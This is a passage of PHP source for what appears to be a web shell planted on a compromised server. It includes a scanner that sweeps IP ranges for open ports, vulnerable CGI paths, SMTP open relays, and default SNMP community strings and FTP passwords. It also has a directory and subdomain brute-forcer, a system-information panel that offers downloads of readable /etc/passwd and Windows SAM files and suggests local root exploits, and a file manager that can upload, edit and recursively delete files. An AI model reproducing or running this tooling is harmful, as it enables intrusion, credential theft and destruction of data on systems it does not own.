  506. $hn=gethostbyaddr($ip);
  507. if($hn!=$ip)echo "$ip [$hn]<br>"; $output=1;}
  508. if(!empty($_REQUEST['ipscanner'])){
  509. $port=$_REQUEST['port'];
  510. if(strstr($port,','))$p=explode(',',$port);else $p[0]=$port;
  511. $open=$ser='';
  512. foreach($p as $po){
  513. $scan=checkthisporT($ip,$po,$timeout);
  514. if($scan){
  515. $ser='';
  516. if($ser=getservbyport($po,'tcp'))$ser="($ser)";
  517. $open.=" $po$ser ";
  518. }
  519. }
  520. if($open){echo "$ip) Open ports:$open<br>";$output=1;}
  521.  
  522. }
  523. if(!empty($_REQUEST['httpbanner'])){
  524. $res=get_sw_namE($ip,$timeout);
  525. if($res){
  526. echo "$ip) Webserver software: ";
  527. if($res==-1)echo 'Unknow';
  528. else echo $res;
  529. echo '<br>';
  530. $output=1;
  531. }
  532. }
  533. if(!empty($_REQUEST['httpscanner'])){
  534. if(checkthisporT($ip,80,$timeout) && !empty($file)){
  535. $admin=array('/admin/','/adm/');
  536. $users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
  537. $nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
  538. $cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
  539. foreach($file as $v){
  540. $vuln=array();
  541. $v=trim($v);
  542. if(!$v || $v{0}=='#')continue;
  543. $v=str_replace('","','^',$v);
  544. $v=str_replace('"','',$v);
  545. $vuln=explode('^',$v);
  546. $page=$cqich=$nukech=$adminch=$userch=$vuln[1];
  547. if(strstr($page,'@CGIDIRS'))
  548. foreach($cgi as $cg){
  549. $cqich=str_replace('@CGIDIRS',$cg,$page);
  550. $url="http://$ip$cqich";
  551. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  552. if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
  553. }
  554. elseif(strstr($page,'@ADMINDIRS'))
  555. foreach($admin as $cg){
  556. $adminch=str_replace('@ADMINDIRS',$cg,$page);
  557. $url="http://$ip$adminch";
  558. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  559. if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
  560. }
  561. elseif(strstr($page,'@USERS'))
  562. foreach($users as $cg){
  563. $userch=str_replace('@USERS',$cg,$page);
  564. $url="http://$ip$userch";
  565. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  566. if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
  567. }
  568. elseif(strstr($page,'@NUKE'))
  569. foreach($nuke as $cg){
  570. $nukech=str_replace('@NUKE',$cg,$page);
  571. $url="http://$ip$nukech";
  572. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  573. if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
  574. }
  575. else{
  576. $url="http://$ip$page";
  577. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  578. if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
  579. }
  580. }
  581. }
  582. }
  583. if(!empty($_REQUEST['smtprelay'])){
  584. if(checkthisporT($ip,25,$timeout)){
  585. $res='';
  586. $res=checksmtP($ip,$timeout);
  587. if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}
  588. }
  589. }
  590. if(!empty($_REQUEST['snmpscanner'])){
  591. if(checkthisporT($ip,161,$timeout,1)){
  592. $com=$_REQUEST['com'];
  593. $coms=$res='';
  594. if(strstr($com,','))$c=explode(',',$com);else $c[0]=$com;
  595. foreach($c as $v){
  596. $ret=snmpchecK($ip,$v,$timeout);
  597. if($ret)$coms.=" $v ";
  598. }
  599. if($coms!=''){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
  600. }
  601. }
  602. if(!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')){
  603. if(checkthisporT($ip,21,$timeout)){
  604. $usps=explode(',',$_REQUEST['userpass']);
  605. foreach($usps as $v){
  606. $user=substr($v,0,strpos($v,':'));
  607. $pass=substr($v,strpos($v,':')+1);
  608. if($pass=='[BLANK]')$pass='';
  609. $ftp=ftp_connect($ip,21,$timeout);
  610. if($ftp){
  611. if(ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) System type: ".ftp_systype($ftp)." (<b><a href='";echo hlinK("seC=ftpc&workingdiR=".getcwd()."&hosT=$ip&useR=$user&pasS=$pass");echo "' target='_blank'>Connect</a></b>)<br>";}
  612. }
  613. }
  614. }
  615. }
  616. if($output)echo '<hr size=1 noshade>';
  617. }
  618. $time=time()-$start;
  619. echo "Done! ($time seconds)</font>";
  620. if(!empty($buglist))unlink($buglist);
  621. }
  622. elseif(!empty($_REQUEST['directoryscanner'])){
  623. $dir=file($_REQUEST['dic']);$host=$_REQUEST['host'];$r=$_REQUEST['r1'];
  624. echo "<font color=blue><pre>Scanning started...\n";
  625. for($i=0;$i<count($dir);$i++){
  626. $d=trim($dir[$i]);
  627. if($r){
  628. $adr="http://$host/$d/";
  629. if(check_urL($adr,'GET','302')){echo "Directory Found: <a href='$adr' target='_blank'>$adr</a>\n";}
  630. }else{
  631. $adr="$d.$host";
  632. $ip=gethostbyname($adr);
  633. if($ip!=$adr){echo "Subdomain Found: <a href='http://$adr' target='_blank'>$adr($ip)</a>\n";}
  634. }
  635. }
  636. echo 'Done!</pre></font>';
  637. }
  638. else{
  639. $t="<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'";
  640. $chbox=(extension_loaded('sockets'))?"<input type=checkbox style='border-width:1px;background-color:#808080;' name=tcp value=1 checked>TCP<input type=checkbox name=udp style='border-width:1px;background-color:#808080;' value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
  641. echo "<center>$t><td>Port scanner:</td></tr><td width='25%' bgcolor='#808080'>Target:</td><td bgcolor='#808080' width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor='#666666' width=25%>From:</td><td bgcolor='#666666' width=25%><input name=fromport type=text value='1' size=5></td></tr><tr><td bgcolor='#808080' width=25%>To:</td><td bgcolor='#808080' width=25%><input name=toport type=text value='1024' size=5></td></tr><tr><td width='25%' bgcolor='#666666'>Timeout:</td><td bgcolor='#666666'><input name=timeout type=text value='2' size=5></td><tr><td width='25%' bgcolor='#808080'>$chbox</td><td bgcolor='#808080' align='right'>$hcwd<input type=submit class=buttons name=portscanner value=Scan></form>$et$t><td>Discoverer:</td></tr><tr><td width='25%' bgcolor='#808080'>Host:</td><td bgcolor='#808080' width=80%><input name=host value='".$_SERVER["HTTP_HOST"]."' size=40></td><td bgcolor='#808080'></td></tr><tr><td width='25%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width=80%><input name=dic size=40></td><td bgcolor='#666666'></td></tr><tr><td width='25%' bgcolor='#808080'>Search for:</td><td bgcolor='#808080' width=40%><input type=radio value=1 checked name=r1>Directories<input type=radio name=r1 value=0>Subdomains</td><td bgcolor='#808080' align='right' width=40%><input type=submit class=buttons name=directoryscanner value=Scan></td></form></tr></table>";
  642. $host=substr($host,0,strrpos($host,"."));
  643. echo "$t name=security><td>Security scanner:</td></tr><td width='25%' bgcolor='#808080'>From:</td><td bgcolor='#808080' width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style='border-width:1px;background-color:#808080;' name=nslookup checked>NS lookup</td></tr><tr><td bgcolor='#666666' width=25%>To:</td><td bgcolor='#666666' width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width='25%' bgcolor='#808080'>Timeout:</td><td bgcolor='#808080'><input name=timeout type=text value='2' size=5></td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ipscanner value=1 checked onClick='document.security.port.disabled = !document.security.port.disabled;' style='border-width:1px;background-color:#666666;'>Port scanner:</td><td bgcolor='#666666'><input name=port type=text value='21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=httpbanner value=1 checked style='border-width:1px;background-color:#808080;'>Get web banner</td><td bgcolor='#808080'><input type=checkbox name=httpscanner value=1 checked style='border-width:1px;background-color:#808080;'>Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style='border-width:1px;background-color:#808080;'>SMTP relay check</td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ftpscanner value=1 checked onClick='document.security.userpass.disabled = !document.security.userpass.disabled;' style='border-width:1px;background-color:#666666;'>FTP password:</td><td bgcolor='#666666'><input name=userpass type=text value='anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=snmpscanner value=1 onClick='document.security.com.disabled = !document.security.com.disabled;' checked style='border-width:1px;background-color:#808080;'>SNMP:</td><td bgcolor='#808080'><input name=com type=text value='public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes' size=60></td></tr><tr><td width='25%' bgcolor='#666666'></td><td bgcolor='#666666' align='right'><input type=submit class=buttons name=securityscanner value=Scan></form>$et";
  644. }
  645. }
  646. function sysinfO(){
  647. global $windows,$disablefunctions,$cwd,$safemode;
  648. $t8="<td width='25%' bgcolor='#808080'>";
  649. $t6="<td width='25%' bgcolor='#666666'>";
  650. $mil="<a target='_blank' href='http://www.milw0rm.org/related.php?program=";
  651. $basedir=(ini_get('open_basedir') || strtoupper(ini_get('open_basedir'))=='ON')?'ON':'OFF';
  652. if(!empty($_SERVER['PROCESSOR_IDENTIFIER']))$CPU=$_SERVER['PROCESSOR_IDENTIFIER'];
  653. $osver=$tsize=$fsize='';
  654. $ds=implode(' ',$disablefunctions);
  655. if($windows){
  656. $osver=' ('.shelL('ver').')';
  657. $sysroot=shelL("echo %systemroot%");
  658. if(empty($sysroot))$sysroot=$_SERVER['SystemRoot'];
  659. if(empty($sysroot))$sysroot = getenv('windir');
  660. if(empty($sysroot))$sysroot = 'Not Found';
  661. if(empty($CPU))$CPU=shelL('echo %PROCESSOR_IDENTIFIER%');
  662. for($i=66;$i<=90;$i++){
  663. $drive=chr($i).':\\';
  664. if(is_dir($drive)){
  665. $fsize+=disk_free_space($drive);
  666. $tsize+=disk_total_space($drive);
  667. }
  668. }
  669. }else{
  670. $ap=shelL('whereis apache');
  671. if(!$ap)$ap='Unknow';
  672. $fsize=disk_free_space('/');
  673. $tsize=disk_total_space('/');
  674. }
  675. $xpl=rootxpL();if(!$xpl)$xpl='Not found.';
  676. $disksize='Used spase: '.showsizE($tsize-$fsize).' Free space: '.showsizE($fsize).' Total space: '.showsizE($tsize);
  677. if(empty($CPU))$CPU='Unknow';
  678. $os=php_uname();
  679. $osn=php_uname('s');
  680. if(!$windows){
  681. $ker=php_uname('r');
  682. $o=($osn=='Linux')?'Linux+Kernel':$osn;
  683. $os=str_replace($osn,"${mil}$o'>$osn</a>",$os);
  684. $os=str_replace($ker,"${mil}Linux+Kernel'>$ker</a>",$os);
  685. $inpa=':';
  686. }else{
  687. $sam=$sysroot."\\system32\\config\\SAM";
  688. $inpa=';';
  689. $os=str_replace($osn,"${mil}MS+Windows'>$osn</a>",$os);
  690. }
  691. $cuser=get_current_user();
  692. if(!$cuser)$cuser='Unknow';
  693. $software=str_replace('Apache',"${mil}Apache'>Apache</a>",$_SERVER['SERVER_SOFTWARE']);
  694. echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td>Server information:</td></tr><tr>${t6}Server:</td><td bgcolor='#666666'>".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr>${t8}Operation system:</td><td bgcolor='#808080'>$os$osver</td></tr><tr>${t6}Web server application:</td><td bgcolor='#666666'>$software</td></tr><tr>${t8}CPU:</td><td bgcolor='#808080'>$CPU</td></tr>${t6}Disk status:</td><td bgcolor='#666666'>$disksize</td></tr><tr>${t8}User domain:</td><td bgcolor='#808080'>";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr>${t6}User name:</td><td bgcolor='#666666'>$cuser</td></tr>";
  695. if($windows){
  696. echo "<tr>${t8}Windows directory:</td><td bgcolor='#808080'><a href='".hlinK("seC=fm&workingdiR=$sysroot")."'>$sysroot</a></td></tr><tr>${t6}Sam file:</td><td bgcolor='#666666'>";if(is_readable(($sam)))echo "<a href='".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."'>Readable</a>"; else echo 'Not readable';echo '</td></tr>';
  697. }
  698. else
  699. {
  700. echo "<tr>${t8}UID - GID:</td><td bgcolor='#808080'>".getmyuid().' - '.getmygid()."</td></tr><tr>${t6}Recommended local root exploits:</td><td bgcolor='#666666'>$xpl</td></tr><tr>${t8}Passwd file:</td><td bgcolor='#808080'>";
  701. if(is_readable('/etc/passwd'))echo "<a href='".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."'>Readable</a>";else echo'Not readable';echo "</td></tr><tr>${t6}${mil}cpanel'>cPanel</a>:</td><td bgcolor='#666666'>";$cp='/usr/local/cpanel/version';$cv=(file_exists($cp) && is_writable($cp))?trim(file_get_contents($cp)):'Unknow';echo "$cv (Log file: ";
  702. if(file_exists('/var/cpanel/accounting.log')){if(is_readable('/var/cpanel/accounting.log'))echo "<a href='".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."'>Readable</a>";else echo 'Not readable';}else echo 'Not found';echo ')</td></tr>';
  703. }
  704. echo "<tr>$t8${mil}PHP'>PHP</a> version:</td><td bgcolor='#808080'><a href='?=".php_logo_guid()."' target='_blank'>".PHP_VERSION."</a> (<a href='".hlinK("seC=phpinfo&workingdiR=$cwd")."'>more...</a>)</td></tr><tr>${t6}Zend version:</td><td bgcolor='#666666'>";if (function_exists('zend_version')) echo "<a href='?=".zend_logo_guid()."' target='_blank'>".zend_version().'</a>';else echo 'Not Found';echo "</td><tr>${t8}Include path:</td><td bgcolor='#808080'>".str_replace($inpa,' ',DEFAULT_INCLUDE_PATH)."</td><tr>${t6}PHP Modules:</td><td bgcolor='#666666'>";$ext=get_loaded_extensions();foreach($ext as $v){$i=phpversion($v);if(!empty($i))$i="($i)";$l=hlinK("exT=$v");echo "<a href='javascript:void(0)' onclick=\"window.open('$l','','width=300,height=200,scrollbars=yes')\">$v</a> $i ";}echo "</td><tr>${t8}Disabled functions:</td><td bgcolor='#808080'>";if(!empty($ds))echo "$ds ";else echo 'Nothing'; echo"</td></tr><tr>${t6}Safe mode:</td><td bgcolor='#666666'>$safemode</td></tr><tr>${t8}Open base dir:</td><td bgcolor='#808080'>$basedir</td></tr><tr>${t6}DBMS:</td><td bgcolor='#666666'>";$sq='';if(function_exists('mysql_connect')) $sq= "${mil}MySQL'>MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle'>Oracle</a> ";if(function_exists('sqlite_open')) $sq.= ' SQLite ';if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= ' mSQL ';if(function_exists('mysqli_connect'))$sq.= ' MySQLi ';if(function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';if ($sq=='') $sq= 'Nothing'; echo "$sq</td></tr></table>";
  705. }
  706. function checksuM($file){
  707. global $et;
  708. echo "<table border=0 style='border-collapse: collapse' width='100%'><tr><td width='10%' bgcolor='#666666'><b>MD5:</b> <font color=#F0F0F0>".md5_file($file).'</font><br><b>SHA1:</b><font color=#F0F0F0>'.sha1_file($file)."</font>$et";
  709. }
  710. function listdiR($cwd,$task){
  711. $c=getcwd();
  712. $dh=opendir($cwd);
  713. while($cont=readdir($dh)){
  714. if($cont=='.' || $cont=='..')continue;
  715. $adr=$cwd.DIRECTORY_SEPARATOR.$cont;
  716. switch($task){
  717. case '0':if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break;
  718. case '1':if(is_writeable($adr)){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break;
  719. case '2':if(is_file($adr) && is_writeable($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";break;
  720. case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break;
  721. case '4':if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";break;
  722. case '5':if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break;
  723. case '6':if(preg_match('@'.$_REQUEST['search'].'@',$cont) || (is_file($adr) && preg_match('@'.$_REQUEST['search'].'@',file_get_contents($adr)))){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break;
  724. case '7':if(strstr($cont,$_REQUEST['search']) || (is_file($adr) && strstr(file_get_contents($adr),$_REQUEST['search']))){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break;
  725. case '8':{if(is_dir($adr))rmdir($adr);else unlink($adr);rmdir($cwd);break;}
  726. }
  727. if(is_dir($adr))listdiR($adr,$task);
  728. }
  729. }
  730. if(!checkfunctioN('posix_getpwuid')){function posix_getpwuid($u){return 0;}}
  731. if(!checkfunctioN('posix_getgrgid')){function posix_getgrgid($g){return 0;}}
  732. function filemanageR(){
  733. global $windows,$msgbox,$errorbox,$t,$et,$cwd,$hcwd;
  734. $table="<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'>";
  735. $td1n="<td width='22%' bgcolor='#666666'>";
  736. $td2m="<td width='22%' bgcolor='#808080'>";
  737. $td1i="<td width='5%' bgcolor='#666666'>";
  738. $td2i="<td width='5%' bgcolor='#808080'>";
  739. $tdnr="<td width='22%' bgcolor='#800000'>";
  740. $tdw="<td width='22%' bgcolor='#006E00'>";
  741. if(!empty($_REQUEST['task'])){
  742. if(!empty($_REQUEST['search']))$_REQUEST['task']=7;
  743. if(!empty($_REQUEST['re']))$_REQUEST['task']=6;
  744. echo '<font color=blue><pre>';
  745. listdiR($cwd,$_REQUEST['task']);
  746. echo '</pre></font>';
  747. }else{
  748. if(!empty($_REQUEST['cP']) || !empty($_REQUEST['mV']) || !empty($_REQUEST['rN'])){
  749. if(!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){
  750. $title='Destination';
  751. $ad=(!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];
  752. $dis=(!empty($_REQUEST['cP']))?'Copy':'Move';
  753. }else{
  754. $ad=$_REQUEST['rN'];
  755. $title='New name';
  756. $dis='Rename';
  757. }
  758. if(!!empty($_REQUEST['deS'])){
  759. echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='100%' bgcolor='#333333'>$title:</td></tr><tr>$td1n<form method='POST'><input type=text value='";if(empty($_REQUEST['rN']))echo $cwd;echo "' size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value='".htmlspecialchars($ad)."' name=cp><input class=buttons type=submit value=$dis></form>$et</center>";
  760. }else{
  761. if(!empty($_REQUEST['rN']))rename($ad,$_REQUEST['deS']);
  762. else{
  763. copy($ad,$_REQUEST['deS']);
  764. if(!empty($_REQUEST['mV']))unlink($ad);
  765. }
  766. }
  767. }
  768. if(!empty($_REQUEST['deL'])){if(is_dir($_REQUEST['deL']))listdiR($_REQUEST['deL'],8);else unlink($_REQUEST['deL']);}
  769. if(!empty($_FILES['uploadfile'])){
  770. move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);
  771. echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>";
  772. }
  773. $select="<select onChange='document.location=this.options[this.selectedIndex].value;'><option value='".hlinK("seC=fm&workingdiR=$cwd")."'>--------</option><option value='";
  774. if(!empty($_REQUEST['newf'])){
  775. if(!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],'');}
  776. if(!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);}
  777. }
  778. if($windows){
  779. echo "$table<td><b>Drives:</b> ";
  780. for($i=66;$i<=90;$i++){$drive=chr($i).':';
  781. if(is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title='$vol' href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";}
  782. }
  783. echo $et;
  784. }
  785. echo "$table<form method='POST'><tr><td width='20%'><b>[ <a id='lk' style='text-decoration:none' href='#' onClick=\"HS('div');\">-</a> ] Location:</b><input type=text name=workingdiR size=135 value='$cwd'><input class=buttons type=submit value=Change></form>$et";
  786. $file=$dir=$link=array();
  787. if($dirhandle=opendir($cwd)){
  788. while($cont=readdir($dirhandle)){
  789. if(is_dir($cwd.DIRECTORY_SEPARATOR.$cont))$dir[]=$cont;
  790. elseif(is_file($cwd.DIRECTORY_SEPARATOR.$cont))$file[]=$cont;
  791. else $link[]=$cont;
  792. }
  793. closedir($dirhandle);
  794. sort($file);sort($dir);sort($link);
  795. echo "<div id='div'><table border=1 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bordercolor='#282828' bgcolor='#333333' width='100%'><tr><td width='30%' bgcolor='#333333' align='center'>Name</td><td width='13%' bgcolor='#333333' align='center'>Owner</td><td width='12%' bgcolor='#333333' align='center'>Modification time</td><td width='12%' bgcolor='#333333' align='center'>Last change</td><td width='5%' bgcolor='#333333' align='center'>Info</td><td width='7%' bgcolor='#333333' align='center'>Size</td><td width='15%' bgcolor='#333333' align='center'>Actions</td></tr>";
  796. $i=0;
  797. foreach($dir as $dn){
  798. echo '<tr>';
  799. $i++;
  800. $own='Unknow';
  801. $owner=posix_getpwuid(fileowner($dn));
  802. $mdate=date('Y/m/d H:i:s',filemtime($dn));
  803. $adate=date('Y/m/d H:i:s',fileatime($dn));
  804. $diraction=$select.hlinK('seC=fm&workingdiR='.realpath($dn))."'>Open</option><option value='".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."'>Rename</option><option value='".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."'>Remove</option></select></td>";
  805. if($owner)$own="<a title=' Shell: ".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>';
  806. if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
  807. if(is_writeable($dn))echo $tdw;elseif(!is_readable($dn))echo $tdnr;else echo $cl2;
  808. echo "<a href='".hlinK('seC=fm&workingdiR='.realpath($dn))."'>";
  809. if(strlen($dn)>45)echo substr($dn,0,42).'...';else echo $dn;echo '</a>';
  810. echo $cl1."$own</td>";
  811. echo $cl1."$mdate</td>";
  812. echo $cl1."$adate</td>";
  813. echo "</td>$cl1";echo "<a href='#' onClick=\"javascript:chmoD('$dn')\" title='Change mode'>";echo 'D';if(is_readable($dn))echo 'R';if(is_writeable($dn))echo 'W';echo '</a></td>';
  814. echo "$cl1------</td>";
  815. echo $cl2.$diraction;
  816. echo '</tr>';
  817. }
  818. foreach($file as $fn){
  819. echo '<tr>';
  820. $i++;
  821. $own='Unknow';
  822. $owner=posix_getpwuid(fileowner($fn));
  823. $fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>Open</option><option value='".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."'>Edit</option><option value='".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."'>Download</option><option value='".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."'>Hex view</option><option value='".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."'>Image</option><option value='".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."'>Include</option><option value='".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."'>Checksum</option><option value='".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."'>Copy</option><option value='".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."'>Move</option><option value='".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."'>Remove</option></select></td>";
  824. $mdate=date('Y/m/d H:i:s',filemtime($fn));
  825. $adate=date('Y/m/d H:i:s',fileatime($fn));
  826. if($owner)$own="<a title='Shell:".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>';
  827. $size=showsizE(filesize($fn));
  828. if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
  829. if(is_writeable($fn))echo $tdw;elseif(!is_readable($fn))echo $tdnr;else echo $cl2;
  830. echo "<a href='".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>";
  831. if(strlen($fn)>45)echo substr($fn,0,42).'...';else echo $fn;echo '</a>';
  832. echo $cl1."$own</td>";
  833. echo $cl1."$mdate</td>";
  834. echo $cl1."$adate</td>";
  835. echo "</td>$cl1";echo "<a href='#' onClick=\"javascript:chmoD('$fn')\" title='Change mode'>";if(is_readable($fn))echo "R";if(is_writeable($fn))echo "W";if(is_executable($fn))echo "X";if(is_uploaded_file($fn))echo "U";echo "</a></td>";
  836. echo "$cl1$size</td>";
  837. echo $cl2.$fileaction;
  838. echo '</tr>';
  839. }
  840. foreach($link as $ln){
  841. $own='Unknow';
  842. $i++;
  843. $owner=posix_getpwuid(fileowner($ln));
  844. $linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."'>Open</option><option value='".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."'>Edit</option><option value='".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."'>Download</option><option value='".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."'>Hex view</option><option value='".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."'>Image</option><option value='".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."'>Include</option><option value='".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."'>Checksum</option><option value='".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."'>Copy</option><option value='".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."'>Move</option><option value='".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."'>Rename</option><option value='".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."'>Remove</option></select></td>";
  845. $mdate=date('Y/m/d H:i:s',filemtime($ln));
  846. $adate=date('Y/m/d H:i:s',fileatime($ln));
  847. if($owner)$own="<a title='Shell: ".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>';
  848. echo '<tr>';
  849. $size=showsizE(filesize($ln));
  850. if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
  851. if(is_writeable($ln))echo $tdw;elseif(!is_readable($ln))echo $tdnr;else echo $cl2;
  852. echo "<a href='".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."'>";
  853. if(strlen($ln)>45)echo substr($ln,0,42).'...';else echo $ln;echo '</a>';
  854. echo $cl1."$own</td>";
  855. echo $cl1."$mdate</td>";
  856. echo $cl1."$adate</td>";
  857. echo "</td>${cl1}";echo "<a href='#' onClick=\"javascript:chmoD('$ln')\" title='Change mode'>L";if(is_readable($ln))echo "R";if (is_writeable($ln))echo "W";if(is_executable($ln))echo "X";echo "</a></td>";
  858. echo "$cl1$size</td>";
  859. echo $cl2.$linkaction;
  860. echo '</tr>';
  861. }
  862. }
  863. $dc=count($dir)-2;
  864. if($dc==-2)$dc=0;
  865. $fc=count($file);
  866. $lc=count($link);
  867. $total=$dc+$fc+$lc;
  868. $min=min(substr(ini_get('upload_max_filesize'),0,strpos(ini_get('post_max_size'),'M')),substr(ini_get('post_max_size'),0,strpos(ini_get('post_max_size'),'M'))).' MB';
